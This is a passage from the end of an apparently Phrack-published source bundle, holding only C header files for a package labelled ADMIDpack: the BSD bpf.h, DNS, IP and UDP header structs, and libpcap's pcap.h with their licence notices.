 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *      This product includes software developed by the University of
 *      California, Berkeley and its contributors.
 * 4. Neither the name of the University nor the names of its contributors
 *    may be used to endorse or promote products derived from this software
 *    without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 *
 *      @(#)bpf.h       7.1 (Berkeley) 5/7/91
 *
 * @(#) $Header: bpf.h,v 1.36 97/06/12 14:29:53 leres Exp $ (LBL)
 */

#ifndef BPF_MAJOR_VERSION

/* BSD style release date */
#define BPF_RELEASE 199606

typedef	int bpf_int32;
typedef	u_int bpf_u_int32;

/*
 * Alignment macros.  BPF_WORDALIGN rounds up to the next 
 * even multiple of BPF_ALIGNMENT. 
 */
#define BPF_ALIGNMENT sizeof(bpf_int32)
#define BPF_WORDALIGN(x) (((x)+(BPF_ALIGNMENT-1))&~(BPF_ALIGNMENT-1))

#define BPF_MAXINSNS 512
#define BPF_MAXBUFSIZE 0x8000
#define BPF_MINBUFSIZE 32

/*
 *  Structure for BIOCSETF.
 */
struct bpf_program {
	u_int bf_len;
	struct bpf_insn *bf_insns;
};
 
/*
 * Struct returned by BIOCGSTATS.
 */
struct bpf_stat {
	u_int bs_recv;		/* number of packets received */
	u_int bs_drop;		/* number of packets dropped */
};

/*
 * Struct return by BIOCVERSION.  This represents the version number of 
 * the filter language described by the instruction encodings below.
 * bpf understands a program iff kernel_major == filter_major &&
 * kernel_minor >= filter_minor, that is, if the value returned by the
 * running kernel has the same major number and a minor number equal
 * equal to or less than the filter being downloaded.  Otherwise, the
 * results are undefined, meaning an error may be returned or packets
 * may be accepted haphazardly.
 * It has nothing to do with the source code version.
 */
struct bpf_version {
	u_short bv_major;
	u_short bv_minor;
};
/* Current version number of filter architecture. */
#define BPF_MAJOR_VERSION 1
#define BPF_MINOR_VERSION 1

/*
 * BPF ioctls
 *
 * The first set is for compatibility with Sun's pcc style
 * header files.  If your using gcc, we assume that you
 * have run fixincludes so the latter set should work.
 */
#if (defined(sun) || defined(ibm032)) && !defined(__GNUC__)
#define	BIOCGBLEN	_IOR(B,102, u_int)
#define	BIOCSBLEN	_IOWR(B,102, u_int)
#define	BIOCSETF	_IOW(B,103, struct bpf_program)
#define	BIOCFLUSH	_IO(B,104)
#define BIOCPROMISC	_IO(B,105)
#define	BIOCGDLT	_IOR(B,106, u_int)
#define BIOCGETIF	_IOR(B,107, struct ifreq)
#define BIOCSETIF	_IOW(B,108, struct ifreq)
#define BIOCSRTIMEOUT	_IOW(B,109, struct timeval)
#define BIOCGRTIMEOUT	_IOR(B,110, struct timeval)
#define BIOCGSTATS	_IOR(B,111, struct bpf_stat)
#define BIOCIMMEDIATE	_IOW(B,112, u_int)
#define BIOCVERSION	_IOR(B,113, struct bpf_version)
#define BIOCSTCPF	_IOW(B,114, struct bpf_program)
#define BIOCSUDPF	_IOW(B,115, struct bpf_program)
#else
#define	BIOCGBLEN	_IOR('B',102, u_int)
#define	BIOCSBLEN	_IOWR('B',102, u_int)
#define	BIOCSETF	_IOW('B',103, struct bpf_program)
#define	BIOCFLUSH	_IO('B',104)
#define BIOCPROMISC	_IO('B',105)
#define	BIOCGDLT	_IOR('B',106, u_int)
#define BIOCGETIF	_IOR('B',107, struct ifreq)
#define BIOCSETIF	_IOW('B',108, struct ifreq)
#define BIOCSRTIMEOUT	_IOW('B',109, struct timeval)
#define BIOCGRTIMEOUT	_IOR('B',110, struct timeval)
#define BIOCGSTATS	_IOR('B',111, struct bpf_stat)
#define BIOCIMMEDIATE	_IOW('B',112, u_int)
#define BIOCVERSION	_IOR('B',113, struct bpf_version)
#define BIOCSTCPF	_IOW('B',114, struct bpf_program)
#define BIOCSUDPF	_IOW('B',115, struct bpf_program)
#endif

/*
 * Structure prepended to each packet.
 */
struct bpf_hdr {
	struct timeval	bh_tstamp;	/* time stamp */
	bpf_u_int32	bh_caplen;	/* length of captured portion */
	bpf_u_int32	bh_datalen;	/* original length of packet */
	u_short		bh_hdrlen;	/* length of bpf header (this struct
					   plus alignment padding) */
};
/*
 * Because the structure above is not a multiple of 4 bytes, some compilers
 * will insist on inserting padding; hence, sizeof(struct bpf_hdr) won't work.
 * Only the kernel needs to know about it; applications use bh_hdrlen.
 */
#ifdef KERNEL
#define SIZEOF_BPF_HDR 18
#endif

/*
 * Data-link level type codes.
 */
#define DLT_NULL	0	/* no link-layer encapsulation */
#define DLT_EN10MB	1	/* Ethernet (10Mb) */
#define DLT_EN3MB	2	/* Experimental Ethernet (3Mb) */
#define DLT_AX25	3	/* Amateur Radio AX.25 */
#define DLT_PRONET	4	/* Proteon ProNET Token Ring */
#define DLT_CHAOS	5	/* Chaos */
#define DLT_IEEE802	6	/* IEEE 802 Networks */
#define DLT_ARCNET	7	/* ARCNET */
#define DLT_SLIP	8	/* Serial Line IP */
#define DLT_PPP		9	/* Point-to-point Protocol */
#define DLT_FDDI	10	/* FDDI */
#define DLT_ATM_RFC1483	11	/* LLC/SNAP encapsulated atm */
#define DLT_RAW		12	/* raw IP */
#define DLT_SLIP_BSDOS	13	/* BSD/OS Serial Line IP */
#define DLT_PPP_BSDOS	14	/* BSD/OS Point-to-point Protocol */

/*
 * The instruction encondings.
 */
/* instruction classes */
#define BPF_CLASS(code) ((code) & 0x07)
#define		BPF_LD		0x00
#define		BPF_LDX		0x01
#define		BPF_ST		0x02
#define		BPF_STX		0x03
#define		BPF_ALU		0x04
#define		BPF_JMP		0x05
#define		BPF_RET		0x06
#define		BPF_MISC	0x07

/* ld/ldx fields */
#define BPF_SIZE(code)	((code) & 0x18)
#define		BPF_W		0x00
#define		BPF_H		0x08
#define		BPF_B		0x10
#define BPF_MODE(code)	((code) & 0xe0)
#define		BPF_IMM 	0x00
#define		BPF_ABS		0x20
#define		BPF_IND		0x40
#define		BPF_MEM		0x60
#define		BPF_LEN		0x80
#define		BPF_MSH		0xa0

/* alu/jmp fields */
#define BPF_OP(code)	((code) & 0xf0)
#define		BPF_ADD		0x00
#define		BPF_SUB		0x10
#define		BPF_MUL		0x20
#define		BPF_DIV		0x30
#define		BPF_OR		0x40
#define		BPF_AND		0x50
#define		BPF_LSH		0x60
#define		BPF_RSH		0x70
#define		BPF_NEG		0x80
#define		BPF_JA		0x00
#define		BPF_JEQ		0x10
#define		BPF_JGT		0x20
#define		BPF_JGE		0x30
#define		BPF_JSET	0x40
#define BPF_SRC(code)	((code) & 0x08)
#define		BPF_K		0x00
#define		BPF_X		0x08

/* ret - BPF_K and BPF_X also apply */
#define BPF_RVAL(code)	((code) & 0x18)
#define		BPF_A		0x10

/* misc */
#define BPF_MISCOP(code) ((code) & 0xf8)
#define		BPF_TAX		0x00
#define		BPF_TXA		0x80

/*
 * The instruction data structure.
 */
struct bpf_insn {
	u_short	code;
	u_char 	jt;
	u_char 	jf;
	bpf_int32 k;
};

/*
 * Macros for insn array initializers.
 */
#define BPF_STMT(code, k) { (u_short)(code), 0, 0, k }
#define BPF_JUMP(code, k, jt, jf) { (u_short)(code), jt, jf, k }

#ifdef KERNEL
extern u_int bpf_filter();
extern void bpfattach();
extern void bpf_tap();
extern void bpf_mtap();
#else
#if __STDC__
extern u_int bpf_filter(struct bpf_insn *, u_char *, u_int, u_int);
#endif
#endif

/*
 * Number of scratch memory words (for BPF_LD|BPF_MEM and BPF_ST).
 */
#define BPF_MEMWORDS 16

#endif
<-->
<++> ADMIDpack/dns.h

#define DNSHDRSIZE 12
   
struct dnshdr {
unsigned short int id;

unsigned char  rd:1;           /* recursion desired */
unsigned char  tc:1;           /* truncated message */
unsigned char  aa:1;           /* authoritive answer */
unsigned char  opcode:4;       /* purpose of message */
unsigned char  qr:1;           /* response flag */

unsigned char  rcode:4;        /* response code */
unsigned char  unused:2;       /* unused bits */
unsigned char  pr:1;           /* primary server required (non standard) */
unsigned char  ra:1;           /* recursion available */

unsigned short int que_num;
unsigned short int rep_num;
unsigned short int num_rr;
unsigned short int num_rrsup;
};
<-->
<++> ADMIDpack/ip.h

/* adapted from tcpdump */

#ifndef IPVERSION
  #define IPVERSION 4
#endif  /* IPVERISON */

struct iphdr {
  u_char  ihl:4,	/* header length */
          version:4;	/* version */
  u_char  tos;		/* type of service */
  short   tot_len;	/* total length */
  u_short id;		/* identification */
  short   off;		/* fragment offset field */
#define IP_DF   0x4000	/* dont fragment flag */
#define IP_MF   0x2000	/* more fragments flag */
  u_char  ttl;		/* time to live */
  u_char  protocol;	/* protocol */
  u_short check;	/* checksum */
  struct  in_addr saddr, daddr;  /* source and dest address */
};

#ifndef IP_MAXPACKET
  #define IP_MAXPACKET 65535
#endif  /* IP_MAXPACKET */
<-->
<++> ADMIDpack/pcap.h
/*
 * Copyright (c) 1993, 1994, 1995, 1996, 1997
 *	The Regents of the University of California.  All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *	This product includes software developed by the Computer Systems
 *	Engineering Group at Lawrence Berkeley Laboratory.
 * 4. Neither the name of the University nor of the Laboratory may be used
 *    to endorse or promote products derived from this software without
 *    specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 *
 * @(#) $Header: pcap.h,v 1.21 97/10/15 21:59:13 leres Exp $ (LBL)
 */

#ifndef lib_pcap_h
#define lib_pcap_h

#include <sys/types.h>
#include <sys/time.h>

#include <bpf.h>

#include <stdio.h>

#define PCAP_VERSION_MAJOR 2
#define PCAP_VERSION_MINOR 4

#define PCAP_ERRBUF_SIZE 256

/*
 * Compatibility for systems that have a bpf.h that
 * predates the bpf typedefs for 64-bit support.
 */
#if BPF_RELEASE - 0 < 199406
typedef	int bpf_int32;
typedef	u_int bpf_u_int32;
#endif

typedef struct pcap pcap_t;
typedef struct pcap_dumper pcap_dumper_t;

/*
 * The first record in the file contains saved values for some
 * of the flags used in the printout phases of tcpdump.
 * Many fields here are 32 bit ints so compilers won't insert unwanted
 * padding; these files need to be interchangeable across architectures.
 */
struct pcap_file_header {
	bpf_u_int32 magic;
	u_short version_major;
	u_short version_minor;
	bpf_int32 thiszone;	/* gmt to local correction */
	bpf_u_int32 sigfigs;	/* accuracy of timestamps */
	bpf_u_int32 snaplen;	/* max length saved portion of each pkt */
	bpf_u_int32 linktype;	/* data link type (DLT_*) */
};

/*
 * Each packet in the dump file is prepended with this generic header.
 * This gets around the problem of different headers for different
 * packet interfaces.
 */
struct pcap_pkthdr {
	struct timeval ts;	/* time stamp */
	bpf_u_int32 caplen;	/* length of portion present */
	bpf_u_int32 len;	/* length this packet (off wire) */
};

/*
 * As returned by the pcap_stats()
 */
struct pcap_stat {
	u_int ps_recv;		/* number of packets received */
	u_int ps_drop;		/* number of packets dropped */
	u_int ps_ifdrop;	/* drops by interface XXX not yet supported */
};

typedef void (*pcap_handler)(u_char *, const struct pcap_pkthdr *,
			     const u_char *);

char	*pcap_lookupdev(char *);
int	pcap_lookupnet(char *, bpf_u_int32 *, bpf_u_int32 *, char *);
pcap_t	*pcap_open_live(char *, int, int, int, char *);
pcap_t	*pcap_open_offline(const char *, char *);
void	pcap_close(pcap_t *);
int	pcap_loop(pcap_t *, int, pcap_handler, u_char *);
int	pcap_dispatch(pcap_t *, int, pcap_handler, u_char *);
const u_char*
	pcap_next(pcap_t *, struct pcap_pkthdr *);
int	pcap_stats(pcap_t *, struct pcap_stat *);
int	pcap_setfilter(pcap_t *, struct bpf_program *);
void	pcap_perror(pcap_t *, char *);
char	*pcap_strerror(int);
char	*pcap_geterr(pcap_t *);
int	pcap_compile(pcap_t *, struct bpf_program *, char *, int,
	    bpf_u_int32);
/* XXX */
int	pcap_freecode(pcap_t *, struct bpf_program *);
int	pcap_datalink(pcap_t *);
int	pcap_snapshot(pcap_t *);
int	pcap_is_swapped(pcap_t *);
int	pcap_major_version(pcap_t *);
int	pcap_minor_version(pcap_t *);

/* XXX */
FILE	*pcap_file(pcap_t *);
int	pcap_fileno(pcap_t *);

pcap_dumper_t *pcap_dump_open(pcap_t *, const char *);
void	pcap_dump_close(pcap_dumper_t *);
void	pcap_dump(u_char *, const struct pcap_pkthdr *, const u_char *);

/* XXX this guy lives in the bpf tree */
u_int	bpf_filter(struct bpf_insn *, u_char *, u_int, u_int);
char	*bpf_image(struct bpf_insn *, int);
#endif
<-->
<++> ADMIDpack/udp.h
struct udphdr {
	u_short source;		/* source port */
	u_short dest;			/* destination port */
	u_short	len;			/* udp length */
	u_short check;		/* udp checksum */
};
<-->

----[  EOF
[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]
© Copyleft 1985-2021, Phrack Magazine.